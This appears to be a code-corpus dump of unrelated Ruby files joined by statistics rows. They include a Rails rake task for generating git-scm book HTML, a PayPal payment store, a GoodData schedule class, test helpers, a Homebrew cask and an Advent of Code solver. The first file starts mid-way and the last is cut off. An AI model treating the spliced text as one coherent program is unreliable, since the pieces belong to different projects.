repo_head = @octokit.ref(repo, "heads/master").object[:sha]
book = Book.where(:edition => 2, :code => code).first_or_create
book.ebook_html = repo_head
begin
rel = @octokit.latest_release(repo)
get_url = -> content_type do
asset = rel.assets.select { |asset| asset.content_type==content_type}.first
if asset
asset.browser_download_url
else
nil
end
end
book.ebook_pdf = get_url.call("application/pdf")
book.ebook_epub = get_url.call("application/epub+zip")
book.ebook_mobi = get_url.call("application/x-mobipocket-ebook")
rescue Octokit::NotFound
book.ebook_pdf = nil
book.ebook_epub = nil
book.ebook_mobi = nil
end
book.save
rescue Exception => msg
puts msg
end
end
end
desc "Generate book html directly from git repo"
task :local_genbook2 => :environment do
if (ENV['GENLANG'] && ENV['GENPATH'])
genbook(ENV['GENLANG']) do |filename|
File.open(File.join(ENV['GENPATH'], filename), "r") {|infile| File.read(infile)}
end
end
end
desc "Generate the book html for the sites (by downloading from atlas)"
task :genbook2 => :environment do
if ENV['GENLANG']
books = Book.where(:edition => 2, :code => ENV['GENLANG'])
else
books = Book.where(:edition => 2, :processed => false)
end
nav = '<div id="nav"><a href="[[nav-prev]]">prev</a> | <a href="[[nav-next]]">next</a></div>'
books.each do |book|
html_file = download(book.ebook_html) # download processed html ebook
Zip::File.open(html_file) do |zip_file|
# Handle entries one by one
max_chapter = 0
chapters = {}
appnumber = 0
chnumber = 0
ids = {}
toc = JSON.parse(zip_file.find_entry("build.json").get_input_stream.read)
navi = nil
if toc['navigations']
navi = toc['navigations']['navigation']
elsif toc['navigation']
navi = toc['navigation']['navigation']
end
navi.each_with_index do |chthing, index|
if chthing['type'] == 'appendix'
appnumber += 1
chapters["xapp#{index}"] = ['appendix', appnumber, chthing['href'], chthing['label']]
end
if chthing['type'] == 'chapter'
chnumber += 1
chapters["ch#{index}"] = ['chapter', chnumber, chthing['href'], chthing['label']]
end
chthing['children'].each do |child|
ids[child['id']] = child['label']
end
end
# sort and create the numbers in order
number = 0
chapters.sort.each_with_index do |entry, index|
p entry
chapter_type, chapter_number, file, title = entry[1]
p file
content = zip_file.find_entry(file).get_input_stream.read
doc = Nokogiri::HTML(content)
chapter = doc.at("section[@data-type=#{chapter_type}]")
chapter_title = title
next if !chapter_title
next if !chapter_number
puts chapter_title
puts chapter_number
number = chapter_number
if chapter_type == 'appendix'
number = 100 + chapter_number
end
id_xref = chapter.attribute('id').to_s
pretext = "<a id=\"#{id_xref}\"></a>"
pretext += doc.search("section[@data-type=#{chapter_type}] > p").to_html
schapter = book.chapters.where(:number => number).first_or_create
schapter.title = chapter_title.to_s
schapter.chapter_type = chapter_type
schapter.chapter_number = chapter_number
schapter.sha = book.ebook_html
schapter.save
# create xref
csection = schapter.sections.where(:number => 1).first_or_create
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
section = 1
chapter.search("section[@data-type=sect1]").each do |sec|
id_xref = sec.attribute('id').to_s
section_title = ids[id_xref]
pretext += "<a id=\"#{id_xref}\"></a>"
html = pretext + sec.inner_html.to_s + nav
html.gsub!('<h3', '<h4')
html.gsub!(/\/h3>/, '/h4>')
html.gsub!('<h2', '<h3')
html.gsub!(/\/h2>/, '/h3>')
html.gsub!('<h1', '<h2')
html.gsub!(/\/h1>/, '/h2>')
if xlink = html.scan(/href=\"1-.*?\.html\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"1-.*?\.html\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
if xlink = html.scan(/href=\"\#(.*?)\"/)
xlink.each do |link|
xref = link.first
html.gsub!(/href=\"\##{xref}\"/, "href=\"ch00/#{xref}\"") rescue nil
end
end
html.gsub!(%r{&(gt|lt|amp);}, '&\1;')
html.gsub!(%r{&</code>(<code class="n">)?(gt|lt|amp)(</code>)?<code class=".">;}, '&\2;')
if subsec = html.scan(/<h3>(.*?)<\/h3>/)
subsec.each do |sub|
sub = sub.first
id = sub.gsub(' ', '-')
html.gsub!(/<h3>#{sub}<\/h3>/, "<h3 id=\"#{id}\"><a href=\"##{id}\">#{sub}</a></h3>") rescue nil
end
end
if subsec = html.scan(/<img src="(.*?)"/)
subsec.each do |sub|
sub = sub.first
html.gsub!(/<img src="#{sub}"/, "<img src=\"/book/en/v2/#{sub}\"") rescue nil
end
end
puts "\t\t#{chapter_type} #{chapter_number}.#{section} : #{chapter_title} . #{section_title} - #{html.size}"
csection = schapter.sections.where(:number => section).first_or_create
csection.title = section_title.to_s
csection.html = html
csection.save
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
# record all the xrefs
(sec.search("section[@id]")+sec.search("figure[@id]")+sec.search("table[@id]")).each do |id|
id_xref = id.attribute('id').to_s
if id_xref[0,3] != 'idp'
xref = Xref.where(:book_id => book.id, :name => id_xref).first_or_create
xref.section = csection
xref.save
end
end
section += 1
pretext = ""
end # loop through sections
#extra = schapter.sections.where("number >= #{section}")
#extra.delete_all
end # if it's a chapter
#extra = book.chapters.where("number > #{number}")
#extra.delete_all
end
book.processed = true
book.save
book.sections.each do |section|
section.set_slug
section.save
end
end
end
def self.download(url)
puts "downloading #{url}"
#return "/Users/schacon/github/progit/gitscm2/ugh/progit-en.661.zip" # for testing
file = File.new("#{Rails.root}/tmp/download" + Time.now.to_i.to_s + Random.new.rand(100).to_s, 'wb')
begin
uri = URI.parse(url)
Net::HTTP.start(uri.host,uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request_get(uri.path) do |resp|
resp.read_body do |segment|
file.write(segment)
end
end
end
puts "Done."
ensure
file.close
end
file.path
end
| 31.393548 | 118 | 0.574599 |
e9dc758e46a93c8001d9be70cc0a87f1ad8d1433 | 205 | module Qapi
class Error < RuntimeError
def initialize(body)
@body = JSON(body)
end
def message
@body['problem']
end
def details
@body['details']
end
end
end
| 12.8125 | 28 | 0.57561 |
4abc56459903335c1eb8235b2730fdff52ac700b | 485 | if ENV["COVERALL"]
require "coveralls"
Coveralls.wear!
end
require "minitest/autorun"
require "minitest/reporters"
require "mocha/setup"
Minitest::Reporters.use! Minitest::Reporters::DefaultReporter.new(color: true)
$LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "public_suffix"
Minitest::Test.class_eval do
unless method_exists?(:assert_not_equal)
def assert_not_equal(exp, act, msg = nil)
assert_operator(exp, :!=, act, msg)
end
end
end
| 22.045455 | 78 | 0.736082 |
ab78cd74eafc53f3117c62075b6fe10a08f3fc8a | 905 | #!/usr/bin/env ruby
# Identical to Part 1
require 'set'
file_path = File.expand_path("../day-19-input.txt", __FILE__)
input = File.read(file_path)
grid = input.split("\n").map do |row|
row.split("")
end
y = 0
x = grid[y].index("|")
direction = :down
steps = 0
visited = Set.new
chars = []
until grid[y][x] == ' '
steps += 1
visited.add([y,x])
case direction
when :down
y += 1
when :up
y -= 1
when :left
x -= 1
when :right
x += 1
end
cell = grid[y][x]
case cell
when '+'
neighbours = [
[:right, y, x + 1],
[:left, y, x - 1],
[:up, y - 1, x],
[:down, y + 1, x]
]
neighbours.each do |dir, y, x|
next if y < 0 || x < 0 || y >= grid.size || x >= grid[y].size
next if visited.include?([y,x])
direction = dir if grid[y][x] != ' '
end
when /\w/
chars << cell
end
end
puts chars.join
puts steps
| 14.836066 | 67 | 0.519337 |
38004aab8ce3d6ec922e88f254c00f7877c6f9a2 | 434 | cask 'comictagger' do
version '1.2.1'
sha256 '31b36527b9415544e2f956c849309320bb955524eaa1ebddab6b97d55c5da4f8'
url "https://github.com/davide-romanini/comictagger/releases/download/#{version}/ComicTagger-#{version}-osx-10.12.6-x86_64.app.zip"
appcast 'https://github.com/davide-romanini/comictagger/releases.atom'
name 'ComicTagger'
homepage 'https://github.com/davide-romanini/comictagger'
app 'ComicTagger.app'
end
| 36.166667 | 133 | 0.78341 |
bbd236dc307d755ae96a01c0c24e2b97a132c129 | 426 | module ActionClient
class ClientsController < ActionClient::ApplicationController
def index
render locals: {
clients: ActionClient::Preview.all
}
end
def show
preview = ActionClient::Preview.find(params[:id])
if preview.present?
render locals: {
client: preview
}
else
raise AbstractController::ActionNotFound
end
end
end
end
| 19.363636 | 63 | 0.619718 |
611fd261751b12715d62a6db13ec1b3a01f2b3cc | 6,302 | module PaypalService::Store::PaypalPayment
PaypalPaymentModel = ::PaypalPayment
InitialPaymentData = EntityUtils.define_builder(
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:merchant_id, :mandatory, :string],
[:payment_status, :mandatory, :string],
[:pending_reason],
[:ext_transaction_id, :string],
[:payment_total, :mandatory, :money],
[:payment_date, :mandatory, :time],
[:currency, :mandatory, :string],
[:token, :string],
)
PaypalPayment = EntityUtils.define_builder(
[:id, :fixnum],
[:community_id, :mandatory, :fixnum],
[:transaction_id, :mandatory, :fixnum],
[:payer_id, :mandatory, :string],
[:receiver_id, :mandatory, :string],
[:merchant_id, :mandatory, :string],
[:payment_status, :mandatory, :symbol],
[:pending_reason, :to_symbol],
[:ext_transaction_id, :string],
[:payment_date, :time],
[:payment_total, :money],
[:fee_total, :money],
[:token, :string])
OPT_UPDATE_FIELDS = [
:ext_transaction_id,
:payment_date,
:payment_total_cents,
:fee_total_cents
]
module_function
# Arguments:
# Opts with mandatory key :data and optional keys :transaction_id, :community_id, :order_id, :authorization_id
# Optional keys identify paypal payment row
#
# Return updated data or if no change, return nil
def update(opts)
if(opts[:data].nil?)
raise ArgumentError.new("No data provided")
end
payment = find_payment(opts)
old_data = from_model(payment)
new_data = update_payment!(payment, opts[:data])
new_data if data_changed?(old_data, new_data)
end
def create(community_id, transaction_id, payment)
begin
payment[:payment_status] = payment[:payment_status].downcase if payment[:payment_status]
payment.merge!({payment_date: Time.now, community_id: community_id, transaction_id: transaction_id, currency: payment[:payment_total].currency.iso_code})
model = PaypalPaymentModel.create!(
InitialPaymentData.call(payment)
)
from_model(model)
rescue ActiveRecord::RecordNotUnique => rnu
get(community_id, transaction_id)
end
end
def get(community_id, transaction_id)
Maybe(PaypalPaymentModel.where(
community_id: community_id,
transaction_id: transaction_id
).first)
.map { |model| from_model(model) }
.or_else(nil)
end
## Privates
def from_model(paypal_payment)
hash = HashUtils.compact(
EntityUtils.model_to_hash(paypal_payment).merge({
payment_total: paypal_payment.payment_total,
fee_total: paypal_payment.fee_total,
payment_status: paypal_payment[:payment_status].to_sym
}))
PaypalPayment.call(hash)
end
def find_payment(opts)
PaypalPaymentModel.where(
"(community_id = ? and transaction_id = ?) or ext_transaction_id = ?",
opts[:community_id],
opts[:transaction_id],
opts[:ext_transaction_id]
).first
end
def data_changed?(old_data, new_data)
old_data != new_data
end
def initial(payment)
payment_total = payment[:payment_total]
total = { payment_total_cents: payment_total.cents, currency: payment_total.currency.iso_code }
InitialPaymentData.call(payment.merge(total))
end
def create_payment_update(update, current_state)
cent_totals = [:payment_total, :fee_total]
.reduce({}) do |cent_totals, m_key|
m = update[m_key]
cent_totals["#{m_key}_cents".to_sym] = m.cents unless m.nil?
cent_totals
end
payment_update = {}
new_status = transform_status(update[:payment_status]) if update[:payment_status]
new_pending_reason = transform_pending_reason(update[:pending_reason])
new_state = to_state(new_status, new_pending_reason) if new_status
if(new_state && valid_transition?(current_state, new_state))
payment_update[:payment_status] = new_status
payment_update[:pending_reason] = new_pending_reason
end
payment_update = HashUtils.sub(update, *OPT_UPDATE_FIELDS).merge(cent_totals).merge(payment_update)
return payment_update
end
def transform_status(status)
status.is_a?(Symbol) ? status : status.downcase.to_sym
end
def transform_pending_reason(reason)
if(reason.nil?)
:none
elsif(reason.is_a? Symbol)
reason
elsif(reason == "payment-review") # Canonical version of payment-review status is with dash
reason.downcase.to_sym
else
reason.downcase.gsub(/[-_]/, "").to_sym # Normalize dashes and underscores away
end
end
def update_payment!(payment, data)
current_state = to_state(payment.payment_status.to_sym, payment.pending_reason.to_sym)
payment_update = create_payment_update(data, current_state)
if payment.nil?
raise ArgumentError.new("No matching payment to update.")
end
payment.update_attributes!(payment_update)
from_model(payment.reload)
end
STATES = {
order: [:pending, :order],
payment_review: [:pending, :"payment-review"],
authorized: [:pending, :authorization],
expired: [:expired, :none],
pending_ext: [:pending, :ext],
completed: [:completed, :none],
voided: [:voided, :none],
denied: [:denied, :none]
}
INTERNAL_REASONS = [:none, :authorization, :order, :"payment-review"]
STATE_HIERARCHY = {
order: 0,
payment_review: 1,
authorized: 2,
expired: 3,
voided: 3,
pending_ext: 3,
completed: 4,
denied: 4,
}
def valid_transition?(current_state, new_state)
STATE_HIERARCHY[current_state] < STATE_HIERARCHY[new_state]
end
def to_state(status, reason)
state = STATES.find { |_, arr| arr == [status, pending_ext_or_internal(reason)] }
unless state.nil?
state.first
else
raise ArgumentError.new("No matching state for status: #{status} and reason: #{reason}.")
end
end
def pending_ext_or_internal(reason)
INTERNAL_REASONS.include?(reason) ? reason : :ext
end
### DEPRECATED! ###
def for_transaction(transaction_id)
Maybe(PaypalPaymentModel.where(transaction_id: transaction_id).first)
.map { |model| from_model(model) }
.or_else(nil)
end
end
| 29.041475 | 159 | 0.688353 |
1da17cbde22e654c66a4c9ba5209c04460e7e5b3 | 875 | module Errors
extend ActiveSupport::Concern
included do
# 参数值不在允许的范围内
# HTTP Status 400
#
# { error: 'ParameterInvalid', message: '原因' }
class ParameterValueNotAllowed < ActionController::ParameterMissing
attr_reader :values
def initialize(param, values)
# :nodoc:
@param = param
@values = values
super("param: #{param} value only allowed in: #{values}")
end
end
# 认证未通过
# HTTP Status 401
#
# { error: 'Unauthorized', message: '原因'}
class UnauthorizedToken < StandardError; end
# 无权限返回信息
# HTTP Status 403
#
# { error: 'AccessDenied', message: '原因' }
class AccessDenied < StandardError; end
# 数据不存在
# HTTP Status 404
#
# { error: 'ResourceNotFound', message: '原因' }
class PageNotFound < StandardError; end
end
end
| 22.435897 | 71 | 0.598857 |
f7a2db0b25fad8f12d3f61e4cc6ceb10162bb1ed | 13,550 | # encoding: UTF-8
#
# Copyright (c) 2010-2015 GoodData Corporation. All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
require_relative '../rest/resource'
require_relative '../extensions/hash'
require_relative '../mixins/rest_resource'
require_relative '../helpers/global_helpers'
require_relative 'execution'
module GutData
class Schedule < Rest::Resource
attr_reader :dirty, :json
SCHEDULE_TEMPLATE = {
:schedule => {
:type => nil,
:timezone => nil,
:params => {},
:hiddenParams => {},
# :reschedule => nil
}
}
class << self
# Looks for schedule
# @param id [String] URL, ID of schedule or :all
# @return [GutData::Schedule|Array<GutData::Schedule>] List of schedules
def [](id, opts = { :client => GutData.connection, :project => GutData.project })
c, project = GutData.get_client_and_project(opts)
if id == :all
GutData::Schedule.all(opts)
else
if id =~ %r{\/gdc\/projects\/[a-zA-Z\d]+\/schedules\/?[a-zA-Z\d]*}
url = id
tmp = c.get url
return c.create(GutData::Schedule, tmp)
end
tmp = c.get "/gdc/projects/#{project.pid}/schedules/#{id}"
c.create(GutData::Schedule, tmp, project: project)
end
end
# Returns list of all schedules for active project
# @return [Array<GutData::Schedule>] List of schedules
def all(opts = { :client => GutData.connection, :project => GutData.project })
c, project = GutData.get_client_and_project(opts)
tmp = c.get "/gdc/projects/#{project.pid}/schedules"
tmp['schedules']['items'].map { |schedule| c.create(GutData::Schedule, schedule, project: project) }
end
# Creates new schedules from parameters passed
#
# @param process_id [String] Process ID
# @param trigger [String|GutData::Schedule] Trigger of schedule. Can be cron string or reference to another schedule.
# @param executable [String] Execution executable
# @param options [Hash] Optional options
# @return [GutData::Schedule] New GutData::Schedule instance
def create(process_id, trigger, executable, options = {})
c, project = GutData.get_client_and_project(options)
fail 'Process ID has to be provided' if process_id.blank?
fail 'Executable has to be provided' if executable.blank?
fail 'Trigger schedule has to be provided' if trigger.blank?
schedule = c.create(GutData::Schedule, GutData::Helpers.deep_stringify_keys(GutData::Helpers.deep_dup(SCHEDULE_TEMPLATE)), client: c, project: project)
default_opts = {
:type => 'MSETL',
:timezone => 'UTC',
:state => 'ENABLED',
:params => {
'PROCESS_ID' => process_id,
'EXECUTABLE' => executable
},
# :reschedule => nil
}
schedule.name = options[:name]
schedule.set_trigger(trigger)
schedule.params = default_opts[:params].merge(options[:params] || {})
schedule.hidden_params = options[:hidden_params] || {}
schedule.timezone = options[:timezone] || default_opts[:timezone]
schedule.state = options[:state] || default_opts[:state]
schedule.schedule_type = options[:type] || default_opts[:type]
schedule.reschedule = options[:reschedule] if options[:reschedule]
schedule
end
end
# Initializes object from raw json
#
# @param json [Object] Raw JSON
# @return [GutData::Schedule] New GutData::Schedule instance
def initialize(json)
json = GutData::Helpers.deep_stringify_keys(json)
super
@json = json
self.params = GutData::Helpers.decode_params(json['schedule']['params'] || {})
self.hidden_params = GutData::Helpers.decode_params(json['schedule']['hiddenParams'] || {})
end
def after
project.schedules(trigger_id)
end
def after=(schedule)
fail 'After trigger has to be a schedule object' unless schedule.is_a?(Schedule)
json['schedule']['triggerScheduleId'] = schedule.obj_id
@json['schedule']['cron'] = nil
@dirty = true
end
# Deletes schedule
def delete
saved? ? client.delete(uri) : nil
end
# Is schedule enabled?
#
# @return [Boolean]
def disabled?
state == 'DISABLED'
end
# Is schedule enabled?
#
# @return [Boolean]
def enabled?
!disabled?
end
# enables
#
# @return [GutData::Schedule]
def enable
@json['schedule']['state'] = 'ENABLED'
@dirty = true
self
end
# Is schedule enabled?
#
# @return [GutData::Schedule]
def disable
@json['schedule']['state'] = 'DISABLED'
@dirty = true
self
end
# Executes schedule
#
# @param [Hash] opts execution options.
# @option opts [Boolean] :wait Wait for execution result
# @return [Object] Raw Response
def execute(opts = {})
return nil unless saved?
opts = { :wait => true }.merge(opts)
data = {
:execution => {}
}
res = client.post(execution_url, data)
execution = client.create(GutData::Execution, res, client: client, project: project)
return execution unless opts[:wait]
execution.wait_for_result(opts)
end
# Returns execution URL
#
# @return [String] Executions URL
def execution_url
saved? ? @json['schedule']['links']['executions'] : nil
end
# Returns execution state
#
# @return [String] Execution state
def state
@json['schedule']['state']
end
def state=(a_state)
@json['schedule']['state'] = a_state
end
# Returns execution timezone
#
# @return [String] Execution timezone
def timezone
@json['schedule']['timezone']
end
# Assigns execution timezone
#
# @param new_timezone [String] Timezone to be set
def timezone=(new_timezone)
@json['schedule']['timezone'] = new_timezone
@dirty = true
end
# Returns execution type
#
# @return [String] Execution type
def type
@json['schedule']['type']
end
# Assigns execution type
#
# @param new_type [String] Execution type to be set
def type=(new_type)
@json['schedule']['type'] = new_type
@dirty = true
end
# Returns execution cron settings
#
# @return [String] Cron settings
def cron
@json['schedule']['cron']
end
# Assigns execution cron settings
#
# @param new_cron [String] Cron settings to be set
def cron=(new_cron)
@json['schedule']['cron'] = new_cron
@json['schedule']['triggerScheduleId'] = nil
@dirty = true
end
# Returns reschedule settings
#
# @return [Integer] Reschedule settings
def reschedule
@json['schedule']['reschedule']
end
# Assigns execution reschedule settings
#
# @param new_reschedule [Integer] Reschedule settings to be set
def reschedule=(new_reschedule)
@json['schedule']['reschedule'] = new_reschedule
@dirty = true
end
# Returns execution process related to this schedule
#
# @return [GutData::Process] Process ID
def process
project.processes(process_id)
end
# Returns execution process ID
#
# @return [String] Process ID
def process_id
@json['schedule']['params']['PROCESS_ID']
end
def process_id=(new_project_id)
@json['schedule']['params']['PROCESS_ID'] = new_project_id
@dirty = true
end
# Returns execution executable
#
# @return [String] Executable (graph) name
def executable
@json['schedule']['params']['EXECUTABLE']
end
# Assigns execution executable
#
# @param new_executable [String] Executable to be set.
def executable=(new_executable)
@json['schedule']['params']['EXECUTABLE'] = new_executable
@dirty = true
end
# Returns enumerator of executions
#
# @return [Array] Raw Executions JSON
def executions
return nil unless @json
url = @json['schedule']['links']['executions']
Enumerator.new do |y|
loop do
res = client.get url
res['executions']['paging']['next']
res['executions']['items'].each do |execution|
y << client.create(Execution, execution, :project => project)
end
url = res['executions']['paging']['next']
break unless url
end
end
end
# Returns hidden_params as Hash
#
# @return [Hash] Hidden Parameters
def hidden_params
@json['schedule']['hiddenParams']
end
# Updates params by merging the current params with new ones
#
# @param params_to_merge [Hash] params
# @return [GutData::Schedule] Returns self
def update_params(params_to_merge)
params_to_merge.each do |k, v|
set_parameter(k, v)
end
@dirty = true
self
end
# Updates hidden params by merging the current params with new ones
#
# @param params_to_merge [Hash] params
# @return [GutData::Schedule] Returns self
def update_hidden_params(params_to_merge)
params_to_merge.each do |k, v|
set_hidden_parameter(k, v)
end
@dirty = true
self
end
# Assigns hidden parameters
#
# @param new_hidden_param [String] Hidden parameters to be set
def hidden_params=(new_hidden_params = {})
@json['schedule']['hiddenParams'] = new_hidden_params
@dirty = true
self
end
# Returns params as Hash
#
# @return [Hash] Parameters
def params
@json['schedule']['params']
end
# Assigns execution parameters
#
# @param params [String] Params to be set
def params=(new_params = {})
default_params = {
'PROCESS_ID' => process_id,
'EXECUTABLE' => executable
}
@json['schedule']['params'] = default_params.merge(new_params)
@dirty = true
self
end
# Saves object if dirty
#
# @return [Boolean] True if saved
def save
fail 'trigger schedule has to be provided' if cron.blank? && trigger_id.blank?
fail 'A timezone has to be provided' if timezone.blank?
fail 'Schedule type has to be provided' if schedule_type.blank?
if @dirty
if saved?
res = client.put(uri, to_update_payload)
@json = Schedule.new(res).json
else
res = client.post "/gdc/projects/#{project.pid}/schedules", to_update_payload
fail 'Unable to create new schedule' if res.nil?
new_obj_json = client.get res['schedule']['links']['self']
@json = Schedule.new(new_obj_json).json
end
@dirty = false
end
self
end
# Updates params at key k with val v
#
# @param k [String] key
# @param v [Object] value
# @return [GutData::Schedule] Returns self
def set_parameter(k, v)
params[k] = v
@dirty = true
self
end
# Updates hidden params at key k with val v
#
# @param k [String] key
# @param v [Object] value
# @return [GutData::Schedule] Returns self
def set_hidden_parameter(k, v)
hidden_params[k] = v
@dirty = true
self
end
def schedule_type
json['schedule']['type']
end
def schedule_type=(type)
json['schedule']['type'] = type
@dirty = true
self
end
def time_based?
cron != nil
end
def to_hash
{
name: name,
type: type,
state: state,
params: params,
hidden_params: hidden_params,
cron: cron,
trigger_id: trigger_id,
timezone: timezone,
uri: uri,
reschedule: reschedule,
executable: executable,
process_id: process_id
}
end
def trigger_id
json['schedule']['triggerScheduleId']
end
def trigger_id=(a_trigger)
json['schedule']['triggerScheduleId'] = a_trigger
@dirty = true
self
end
def name
json['schedule']['name']
end
def name=(name)
json['schedule']['name'] = name
@dirty = true
self
end
def set_trigger(trigger) # rubocop:disable Style/AccessorMethodName
if trigger.is_a?(String) && trigger =~ /[a-fA-Z0-9]{24}/
self.trigger_id = trigger
elsif trigger.is_a?(GutData::Schedule)
self.trigger_id = trigger.obj_id
else
self.cron = trigger
end
end
# Returns URL
#
# @return [String] Schedule URL
def uri
@json['schedule']['links']['self'] if @json && @json['schedule'] && @json['schedule']['links']
end
def ==(other)
other.respond_to?(:uri) && other.uri == uri && other.respond_to?(:to_hash) && other.to_hash == to_hash
end
def to_update_payload
res = {
'schedule' => {
'name' => name,
'type' => type,
'state' => state,
'timezone' => timezone,
'cron' => cron,
'triggerScheduleId' => trigger_id,
'params' => GutData::Helpers.encode_public_params(params),
'hiddenParams' => GutData::Helpers.encode_hidden_params(hidden_params)
}
}
res['schedule']['reschedule'] = reschedule if reschedule
res
end
end
end
| 26.93837 | 159 | 0.600812 |
abef1edcb482a64175f5262d92c9c31649f7be0b | 894 | require 'yaml'
module FlipTheSwitch
module Reader
class Defaults
def defaults
if valid_file?
base_defaults.merge(file_defaults)
else
raise Error::InvalidFile.new(defaults_file_name)
end
end
private
def valid_file?
file_defaults.is_a?(Hash)
end
def base_defaults
{
'input' => Dir.pwd,
'environment' => 'default',
'enabled' => '',
'disabled' => '',
'category_output' => Dir.pwd,
'plist_output' => Dir.pwd,
'settings_output' => Dir.pwd
}
end
def file_defaults
@file_defaults ||= if File.exists?(defaults_file_name)
YAML.load(File.read(defaults_file_name))
else
{}
end
end
def defaults_file_name
'.flip.yml'
end
end
end
end
| 19.434783 | 62 | 0.526846 |
e9f2e885b0a7c0be5f1eaafd60ed8e50f9216652 | 583 | require 'mongoid/cases/test_base'
class Mongoid::ValidationsTest < ClientSideValidations::MongoidTestBase
class ::Book3 < Book
validates :author_name, :presence => true
end
def test_validations_to_client_side_hash
book = Book3.new
expected_hash = {
:author_email => {
:uniqueness => [{:message => "is already taken"}]
}, :author_name => {
:uniqueness => [{:message => "is already taken"}],
:presence => [{:message => "can't be blank"}]
}
}
assert_equal expected_hash, book.client_side_validation_hash
end
end
| 25.347826 | 71 | 0.646655 |
18566717084425fd00db5309be37fb89102664c9 | 1,428 | =begin
The PostFinance Checkout API allows an easy interaction with the PostFinance Checkout web service.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=end
require 'date'
module PostFinanceCheckout
class TransactionState
CREATE = 'CREATE'.freeze
PENDING = 'PENDING'.freeze
CONFIRMED = 'CONFIRMED'.freeze
PROCESSING = 'PROCESSING'.freeze
FAILED = 'FAILED'.freeze
AUTHORIZED = 'AUTHORIZED'.freeze
VOIDED = 'VOIDED'.freeze
COMPLETED = 'COMPLETED'.freeze
FULFILL = 'FULFILL'.freeze
DECLINE = 'DECLINE'.freeze
# Builds the enum from string
# @param [String] The enum value in the form of the string
# @return [String] The enum value
def build_from_hash(value)
constantValues = TransactionState.constants.select { |c| TransactionState::const_get(c) == value }
raise "Invalid ENUM value #{value} for class #TransactionState" if constantValues.empty?
value
end
end
end
| 32.454545 | 104 | 0.738095 |
26f71f1cf06460662b50b6b2aece3f433049a850 | 109 | FactoryBot.define do
factory :investigation_kind do
name "MyString"
description "MyText"
end
end
| 15.571429 | 32 | 0.733945 |
87e0b37ae36a7a417885e178aefc085dc4ef84fe | 1,733 | # MIT License
#
# Copyright 2019 Niklas Schultz.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# The BitInByte object represents a single bit inside a byte value.
# He accepts a postion of himself which must be in the range
# of 1-8 and the actualbyte value which must be in the range of 0-255.
# The byte value may be decimal, hex, octal, or binary.
#
# author:: Niklas Schultz
# version:: 0.1.2
# license:: MIT
class BitInByte
def initialize(pos, byte)
@pos = pos
@byte = byte
end
def value
raise ArgumentError, 'pos must be 1-8' if @pos <= 0 || @pos > 8
raise ArgumentError, 'byte must be 0-255' if @byte < 0 || @byte > 255
position = @pos - 1
((1 << position) & @byte) != 0
end
end
| 38.511111 | 79 | 0.732833 |
79f1c69a08d253c4fe5f9f96a33896b39880b597 | 928 | # frozen_string_literal: true
RSpec.shared_context 'with associated error handler setup' do
let(:association_name) { 'foos' }
let(:record_num) { 0 }
let(:error) { instance_double(ActiveModel::Error) }
before { allow(error).to receive(:attribute).and_return('bar') }
end
RSpec.shared_examples 'a govuk design system associated error handler' do
describe '#associated_error_attribute' do
subject { validator.associated_error_attribute(association_name, record_num, error) }
include_context 'with associated error handler setup'
it { is_expected.to eql('foos_attributes_0_bar') }
end
end
RSpec.shared_examples 'a custom CCCD associated error handler' do
describe '#associated_error_attribute' do
subject { validator.associated_error_attribute(association_name, record_num, error) }
include_context 'with associated error handler setup'
it { is_expected.to eql('foo_1_bar') }
end
end
| 30.933333 | 89 | 0.762931 |
ac0372279b0c73c2d6a6c6881d97971847e0ef72 | 1,256 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Storage::Mgmt::V2018_03_01_preview
module Models
#
# The List service SAS credentials operation response.
#
class ListServiceSasResponse
include MsRestAzure
# @return [String] List service SAS credentials of specific resource.
attr_accessor :service_sas_token
#
# Mapper for ListServiceSasResponse class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ListServiceSasResponse',
type: {
name: 'Composite',
class_name: 'ListServiceSasResponse',
model_properties: {
service_sas_token: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'serviceSasToken',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.166667 | 75 | 0.575637 |
28da9a8f30b056a8b6da9898cabb251d0f73b8b0 | 336 | require 'test_helper'
class InboxControllerTest < ActionController::TestCase
=begin
test "should get index" do
get :index
assert_response :success
end
test "should get show" do
get :show
assert_response :success
end
test "should get destroy" do
get :destroy
assert_response :success
end
=end
end
| 15.272727 | 54 | 0.708333 |
f8fd316314d4b486c477d77103cd065346027bf7 | 1,224 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
